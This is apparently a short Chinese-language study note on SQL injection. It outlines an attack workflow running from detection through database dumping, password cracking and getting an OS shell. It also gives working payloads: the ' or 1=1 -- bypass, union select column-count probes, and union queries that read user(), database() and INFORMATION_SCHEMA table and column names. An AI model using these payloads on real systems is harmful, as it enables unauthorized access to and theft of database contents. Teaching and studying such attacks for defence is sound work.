sql注入攻击

流程

1. 判断是否有sql注入漏洞 – 扫描端口
2. 判断操作系统，数据库，web类型
3. 获取数据库信息，管理员信息 拖库
4. 加密信息破解
5. 提升权限 获得sql-shell、os-shell、后台登录。

第一个注入语句

要注入时 我们可以先输入 ' 对 ，就是 单引号 如果出现数据库报错 我们就有机会进行下一步操作
注入' or 1=1 --
’ :闭合前面的单引号
or : 或者
– : 注释后面的

使用union查询

union语句查询用于联合前面的select查询语句，合并查询更多信息

注入
手动测试有几个信息 union 联合查询 需要知道前面有几条信息

' union select 1 --'
' union select 1,2 --'
...

比如查到有两个 那我们可查询有用信息

//注入查询 当前用户的名字和数据库
' union select user(),database() --'
version()  //数据库版本号
database()// 数据库名
user() //当前用户

columns_name 列名
table_name 表名
INFORMATION_SCHEMA.tables
这个表中有TABLE_SCHEMA 字段 存放的是各数据库名
INFORMATION_SCHEMA.columns

//注入 查询所有库名
' union select TABLE_SCHEMA,1 from INFORMATION_SCHEMA.TABLES --'
//数据库库名

// 注入 查询数据表
' union select 1,column_name from INFORMATION_SCHEMA.columns where table_name='***' --'
//*** 是表明